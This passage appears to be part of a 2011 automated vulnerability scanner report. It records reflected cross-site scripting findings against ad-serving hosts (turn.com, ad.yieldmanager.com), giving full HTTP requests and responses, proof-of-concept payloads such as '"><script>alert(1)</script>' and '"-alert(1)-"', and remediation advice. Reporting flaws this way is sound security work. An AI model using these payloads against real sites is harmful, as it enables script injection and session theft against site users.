Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=Dza9cImQIgAOYp1sdVBFKJ3j2mm-3nw5DLdjMDY9RiDfaqaDzVRu9ZiuBStYaftY-vQa-Lrt8AEh2sMWSofalPWfoLMBxH0g9IiAwEZtd5YPMEpw2Dimbl_Ar_3pbVlWCr9zpcNmhJ4YALFsRS0OjTgV6OPboE5AailwYD2p-IySdlkZutLQ7ZQ85RG7C4VB2qlA743KvZ39ywpdZbpMhh0Lmtiu91APHHd__cAh9gz07Cd5Zg6Jg2z-OuW7NiYiFK2x3qhPSvxxgQjvFMzvNsv0sG_uSycuZycGHG0i9JDVJjS_HVyCCR3CpH4C_z7OWENSx6qTFa7od7SUHN9Egei6BZRgi_D5YzTOICCuYCx9jiGo5Ucxoan5H4AQ_xV3iHql4u4O7_sSYdnd02k2DNQHkfpT4yC0sBHWKifDZRo8VXe-PeWk1nfFtbmH7GvZ1QMXO5GUno07zoygwBocRoTsxUcxWk5nbrSqN6k58j1TORmwcQ4tlm0RwihyF_UsCL2x9N8rCbkNMc9dtlOLKF16IBansyDt77nh-l623XjbgLPXgE5UhrKbb-yapi7Iz_t1m3RC9HNVGEroWY24Hx0ymz9iB_PZ274hwZ5aW0QB1cBEZ955Qck8jqa4MZ7v1aY1ttiEjhYPnmeJ7sqVaGWGUflWpKK8ZDluGXe-OMAMpHNeDinV6bUD4c7xTKPYqOV7QZ7aFBA3m0phFzvLGUyTINTvrbznNuEHAKkRnaoKqQQIp4dB6WERi9SKRUeAKB26GseFkfH7OU-Y9jArFwJN1aNKu26HMlC2vlBlEo3AibJolRtP9GKY2j0AIA4QF0ROUKwFAxzf5GHHC-l2sUbwMrieaxWXba1ERSK3tWWrKuMIkiwSl3Te1VhilaTSnNbIlFewbQ0HwOyAYWPKVOFzsrgdqMMSA-afxC3bSvIKc60386S8NF-JuqnS_gYeiHql4u4O7_sSYdnd02k2DGktwZFEgr-H1aRa-v8iL2Y8VXe-PeWk1nfFtbmH7GvZojS9aaLdC4dIDTz1p5oDzGZlZrZQz9gqPi_YpBWRR_zyJstfeR3BF0X80yINyf_bnscLz8pWZl03MCHITMyErF16IBansyDt77nh-l623XgQrvHzCa6-Ar3OKf1u5O9co8jF4KazkjYUhi9Y-2cpubMeTwvrsn6UDDgstfmlQPoNQYQoyiD68kJjw-yNw0ZU1aY1ttiEjhYPnmeJ7sqVaHrw4FE_cCyjpsbZ3unV7uMrdoKrhpnovF-eFvpriEhVrMfpGoruuBgzA1-jEhdCS2wFnaEJ_77D-SBSvq4apv0KqQQIp4dB6WERi9SKRUeApAoLbAXgH3MAg4fG-53hwYWvZ7p1zrzJVM0-BhBuMNYrc7Kk7dBes7lnotHfeZ9VkUKGgPT-wupZmNTexU6iznjzwSpHwNAhjAO4xxi375pcdR85v5iezdnNkxnuNwjFRvAyuJ5rFZdtrURFIre1ZZBSlbvBC0evnYqUUsRvAsWc1siUV7BtDQfA7IBhY8pUNZFdTBAhalBFYq3Dyxi9TBfNNCsQZvwCdk93ue_PwR2IeqXi7g7v-xJh2d3TaTYMVxQyOpakzryCsBb1QMcxxTxVd7495aTWd8W1uYfsa9lUSQm6Px99bWr2RVRxuk2yEM0JJ22tYCLP7uBw8UeaI1M5GbBxDi2WbRHCKHIX9Sz_QtJiSnym5S_qsqKzl484XXogFqezIO3vueH6XrbdeBrsNvqpBtQW35VrocWM1hJEMrVYqmvz7xJtELJ71uRTTECD0HA2vYVMATXXOR4kic7TP4ECMD5bQt22Ufb1ASjVpjW22ISOFg-eZ4nuypVoX3-sqUKgtXKTyeeAJ3WoNBTpFHNeMdsJNdx7bmFAC56JAHYn97lyiGJ5XDJCkUNkw_be5i-Fx9NF-BKeFGAMPAqpBAinh0HpYRGL1IpFR4AB4o7EViaAPEO7EwRwSKXjmcb3GKio9SBOsgaqPfeFsasCu54shXpdyVhXu91m5wiW91g1mAzej0c7wnGxz5vZRvAyuJ5rFZdtrURFIre1ZfDRnDTWzff-YlyXP_zUgfGc1siUV7BtDQfA7IBhY8pUeWxnJe61Raa9uTyiNiaLtdI3rxLW4kElZ2z2lu4o7hWIeqXi7g7v-xJh2d3TaTYML11pzoZIlFkYCIGVGm_tUjxVd7495aTWd8W1uYfsa9nlK9dyZVYIz5pmDpzdU80QQkZpM_cVFXYTcTTPOspL-TBLfO2ZZ5wOsMI8xMfjrvrnuyo8Yez2B_AzlVUYglieXXogFqezIO3vueH6XrbdeOZqLTJ2eUC5VtOBQseHiE81nClsShNFF0lz8B3FOROwHTKbP2IH89nbviHBnlpbRDDco7mBS3_DJ0ZnqsKZKeTVpjW22ISOFg-eZ4nuypVotMax7cw1A0lomZOewLLuUzHWvz6IKIMXKnKL80iX025NYG1qkKS0O8LGs7luRUbTpMVbMDENDpvIJh2_kOeZwWW0-b-WJf0ZFlMOgj84vlCimF9cP6eLyeThS4cELoZF7hIMY-yiS6od8aiwiVy6K8hyJ0-yKCmYc6DEnkoIDjLUURQ9jCbj0adNONAbHq6OIauKDPsVyaYkWyAz1a3QLsZ0HFEk9FUwZlIZoC4PKchFMfXO25PtkA1FJuDF1eIqRRk7NbH_3KXaXpegXdoohM0M5HiSWAEvqit8JfBxvjBBCecmNOFvmnxZXlybKUM3qIhRpr8zAond1hyHy2KCxQ9jRTaSUh9q8NAYC-8-qkSZEZsmx23qKVCrqZDyeipaIi4-WrfUh7IPblkcEwLIfWk4JnPVlR_zGm4PPqzfx4-ZPuIxR87K17SR-59M9UpIVvIMltY5lVfKu7zjIgIpMBKB2P8TaeZb5SMS1Kn2fJf0-MGZW4U9vWHTndk9ZYnTYKRbzB2AW8sPYtx1gLnWIDsYBLT8b4yTE_t-fjXYNBuH2MTsqi1WP1f5naPDjKNVGGv49osHpNOU5hR-g_XrO60jJc9MudtXKgUybYsjSwmSw3Whqt4otLu1R9f4pMroY6TrnX9AFtcCOq4KtB3OqN2gLia6NWPazuloW1Dp_gmgtfmkSSGnmz7Ck--msIbUItDCaX4V_0YzpDgobT5myGAQ1jpLDCI7HiZjNNO0_95EX9SUHeo0SvSjgEUZJK2gWAKmardOPRrryF1DhECcp1-YMQnoV4ZAArTQ0YurxnNN6cMRpOMh2nE5XzpH9jU_75X6gaFQNyuWz4EiPqighnBW1K7ySrDy2erbCyocIlO9iKCeGUvo-FRYRZN7b2HzshKpWim7EvVYj9LxNPbnlLRl7SF6Fz-Cqk4ilR2m1sd6XpoV6J-HdTmFEl8Fex_S_sTGaqkuGDnpWV_Epn14CgCD-1Od2j93-G993DJLn6laQk0A_YEjXCNxN4ufXJe2s8taXVc1ZwCaKwQ-ReuFBa_BvA0MPyd7JlyBvMOrx4RsY1dMYwNR_ohNoy9a29HQKTTBeSdexy7NjxMrQdbG848mPsvXEVp1Zp9tlw0PafTHwRamGgGanwtSRVH2wEa3NxSTCsrM00Brun6QttnrZ4i40yYFMUM2IND36b7ZFw4; fc=qPpK4X8K7ZjxVx0VJZDcdB_D1mN3lHI_BinJ1LdrOAbDh9xILOy7cWXWYifPzZ3iZjzoSdlEeqq3zCQrton2D32iD1a2418t8vlUtDGalV-JhisFugd5-2PmgEb-dzYcx_84B0Gt7iZQiKNqGC2CofHgZs6hnwrt4AvKtyKV8klPR1hRXEWvUhiTNhz33U4d9hTEpcCaiTjdUImk_rGRYl95QzLPGgcS4PLuvzPSDFoeX72gpvVoMR_dT1IU83itQkcPCNDBJR1s8ojl7c8L5k9KWBxjpL-6lYKR74fQmyE; pf=WmCQSJv_88YAF1TaCEjacvtFyKtKd3nkimHPVBGJrCArW05u4B9BwnHxy5LHSNbs0PyvhiQ9hEGFvp1qMvxzBcdiicNNmmE_aI2n_-oR-aRG9eqUO6PdyPlHytyWBeL6pt4N9d3OY-Qo6M3zGftguNTbm-VGCKrn7KG61o8a-hlxQgbL-MXnxJnxbWK81XM2fNbwnskl80J7FrpArydV4msv5xJnc6wiNkkgoc9ZHAqEvAXfc_b9CYsOLM4ObfRS-yQ0IxDS6yGV0bt0Oz4pJzQ3Hu9GorHJq3pkzhhXE4dM0xncvVUD6tMlnnlm_qWsojASvNxNlCtZvel71OhRg1_acYxwuGBwWmnpT3WVNmeWKUlZO7GlHHuYkG_xUYpdlRr7vUCIaoiDaMmpt_PvLCOUyLGtO0hHJuwGY5T09JX2RCeAmas1by9-2jjXtHbxIU6XTk6RPEnQXT9x2zEmWfAeEJZ2W4XMeMQpqzhWB_34UH3sPqU14UWUW_0z8Z0heNyepssmwJo9AEHB3dcHG8NqNopQF7bmOYrUClo2LIAxUFIqqMfzF-f5IilV9DF2EEtf1qwB8GY1P6ISMC2NEE-NukVybOAFf3snxZsusnThrdw025CqgpXbAJf_ZgK04z5LE7vpNsVQaepPKy5giom1bq2yFvVGruUD-0Zmu_IOz-UlYiPBN7JyoSoKGJwMowB-sj_YCAwsoyO3MSAriA-6SvpE8vfm17M_AiAxw4nAd1Y9GjRixW8BKZaPBicaTSnQ_qW1THdHtsDrSOwE7yWjUosqwui97JSt4J0g_MOMd0ReLIPTEksHwzd4gYkpoMm2n6Nulr0bAVvGt4WcZWdCKTjb3Ww3q4Lyh_VyGMuPK371XlXjo5X46eVqRbV699MOJ5eDdshYLSs5LFoOgILjO_vdFh0XnPmUquTICkH1HrsiJSZNWOX0SyN8dywaeYYZUTlRetsuBzMcxMWLQLNyiRU1bJ5Qpb7GomgPhXBwcMjXa09KP5HzekSxDcQK0SJw0JMmSyeQM3pYTVx-Ci-FU5aKfMy17HNvPHxNvxNrRXY1izURX-lyALi1AlxuBXTDiJUS-OqKWjm2DD4CuggKG3dUzHMmu04fSX5Ad4nEc6NlGzZLMuoExgCCt30kp2pmOmYcQYMZyZ05DubgihMl8PJOwcr8ldScAKqk7rGGnUh27gMWCyrnP1Di5AGzTucfcXTrqV1UJKyBhGxFYcQFai9M2J3rqJmFUgQdN5ATDIRwfK3uozaJUKhU4qVipaL_GD-TOTelik5DYCvXIYIInb3nfIa-ebQa7olHWWH486R4yxje4LN8GWCWWRe4IR0I9DtTjuVzRJkyZ8n66XpUPlCRi3tlvuMEH6BKrtjGsUA2wOoIXFuaM_JUwMHDgab4_aPrZdgl9Uf7tvD9rgyRTxnR6YKNm8Gu6ALXRmCYGTIP8i-wsqx8QkqNgi0F_hs9UZaVZDpy-HyTAsx-Y51cz4yJITcb0FaAWC4QbaWSbbOECFNVbSmOiTVVH4eEKD1WvX5M7UplxrzwIhN9Mwkgo1sMiNanUUl1UyNj_Qxjp4iBCha2ShvDZxpY4-NTPO_cWHxychz2AkV4XXIJ0g; uid=2931142961646634775; rrs=1%7C2%7C3%7C4%7C1002%7C6%7C7%7C7%7C9%7C1001%7C1006%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7C1007%7C1008; rds=15093%7C15093%7C15093%7C15104%7C15085%7C15097%7C15097%7C15082%7C15093%7C15093%7C15091%7C15093%7C15093%7C15093%7Cundefined%7C15093%7Cundefined%7C15097%7C15093; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Sat, 05-Nov-2011 14:00:11 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:11 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=4537377354125894831&fpid=a0bfe"><script>alert(1)</script>10708fa3251&nu=n&t=&sp=n&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

3.24. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f258"><script>alert(1)</script>bb97804a671 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=468x60&section=1384085&2f258"><script>alert(1)</script>bb97804a671=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.surphace.com/ads/rubicon_orlandosentinel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!-!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!!J<[!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<y-(rM.jTN!!L7_!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<yjn9M.jTN!#mP:!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mP>!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPA!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPD!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPG!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPJ!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#p!r!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<xtrb!!.vL"; ih="b!!!!?!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+Z*!!!!$<xl/w!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1kC+!!!!%<xqSY!1kC5!!!!#<xqR`!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM"; bh="b!!!%/!!!?H!!!!%<wR0_!!*oY!!!!'<ypn'!!-?2!!!!-<ypn'!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!(<ypn'!!0O4!!!!)<y]81!!0O<!!!!/<y]81!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!/<y]81!!J<E!!!!/<y]81!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!(<ypn'!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!%<ypn'!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!0<y]81!!q:E!!!!-<y]81!!q<+!!!!.<y]81!!q</!!!!.<y]81!!q<3!!!!.<y]81!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!(<ypn'!!ucq!!!!/<y]81!!vRm!!!!)<y]81!!vRq!!!!)<y]81!!vRr!!!!)<y]81!!vRw!!!!/<y]81!!vRx!!!!)<y]81!!vRy!!!!)<y]81!!w3l!!!!(<ypn'!!wQ3!!!!(<ypn'!!wQ5!!!!(<ypn'!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!)<y]81!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!%<ypn'!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2Rn!!!!#<x2wq!#2XY!!!!)<y]8:!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!)<y]81!#48w!!2s=<xrZD!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!)<y]81!#7.'!!!!)<y]81!#7.:!!!!)<y]81!#7.O!!!!)<y]81!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#KjQ!!B1c<xl.o!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!)<y]81!#MTF!!!!)<y]81!#MTH!!!!)<y]81!#MTI!!!!)<y]81!#MTJ!!!!)<y]81!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#N44!!!!#<x2wq!#N45!!!!#<xr]M!#O29!!!!%<ypn'!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!/<y]81!#SF3!!!!/<y]81!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!)<y]81!#UDP!!!!/<y]81!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#Z8A!!!!%<ypn'!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!$<xtBW!#]@s!!!!%<whqH!#]Z!!!!!%<ypn'!#^@9!!!!#<x2wq!#^bt!!!!%<xr]Q!#^d6!!!!$<xtBW!#`-7!!!!%<ypn'!#`S2!!!!(<ypn'!#`U0!!!!'<ypn'!#`U9!!!!%<ypn'!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!'<ypn'!#a=7!!!!'<ypn'!#a=9!!!!'<ypn'!#a=P!!!!'<ypn'!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!)<y]81!#ai7!!!!)<y]81!#ai?!!!!)<y]81!#b:Z!!!!#<x2wq!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!%<ypn'!#c8W!!!!%<ypn'!#c8X!!!!%<ypn'!#c8]!!!!%<ypn'!#c?c!!!!)<y]81!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e9?!!!!#<y,`,!#eLS!!!!#<yjEE!#ePa!!!!#<xr]M!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!%<ypn'!#fG+!!!!'<ypn'!#g=!!!!!%<ypn'!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#gsr!!!!#<x2wq!#h.N!!!!#<yMiw!#k]4!!!!#<x2wq!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ne_!!!!%<ypn'!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!)<y]81!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!)<y]81!#tM)!!!!)<y]81!#tn2!!!!)<y]81!#uE=!!!!#<x9#K!#uJY!!!!/<y]81!#uR3!!!!%<ypn'!#ujQ!!!!%<ypn'!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#v,Z!!!!#<xt>i!#vyX!!!!)<y]81!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!,<y]81!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!8/!!!!#<xl.y!$!:w!!!!#<x2wq!$!:x!!!!#<xr]M!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!$<ypn'!$#R7!!!!)<y]81!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!)<y]81!$(!P!!!!(<ypn'!$(+N!!!!#<wGkB!$(Gt!!!!,<y]81!$(S9!!!!%<ypn'!$(Tb!!!!#<yQLc!$(V0!!!!%<y*E<!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)DI!!!!#<x2wq!$)GB!!!!(<ypn'!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!%<ypn'"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:27 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 09 May 2011 14:00:27 GMT
Pragma: no-cache
Content-Length: 4690
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?2f258"><script>alert(1)</script>bb97804a671=1&Z=468x60&s=1384085&t=2" target="_parent">
...[SNIP]...

3.25. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f2c2"-alert(1)-"6ceae886f18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=468x60&section=1384085&8f2c2"-alert(1)-"6ceae886f18=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.surphace.com/ads/rubicon_orlandosentinel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!-!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!!J<[!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<y-(rM.jTN!!L7_!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<yjn9M.jTN!#mP:!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mP>!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPA!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPD!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPG!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPJ!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#p!r!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<xtrb!!.vL"; ih="b!!!!?!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+Z*!!!!$<xl/w!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1kC+!!!!%<xqSY!1kC5!!!!#<xqR`!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM"; bh="b!!!%/!!!?H!!!!%<wR0_!!*oY!!!!'<ypn'!!-?2!!!!-<ypn'!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!(<ypn'!!0O4!!!!)<y]81!!0O<!!!!/<y]81!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!/<y]81!!J<E!!!!/<y]81!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!(<ypn'!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!%<ypn'!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!0<y]81!!q:E!!!!-<y]81!!q<+!!!!.<y]81!!q</!!!!.<y]81!!q<3!!!!.<y]81!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!(<ypn'!!ucq!!!!/<y]81!!vRm!!!!)<y]81!!vRq!!!!)<y]81!!vRr!!!!)<y]81!!vRw!!!!/<y]81!!vRx!!!!)<y]81!!vRy!!!!)<y]81!!w3l!!!!(<ypn'!!wQ3!!!!(<ypn'!!wQ5!!!!(<ypn'!!wcu!!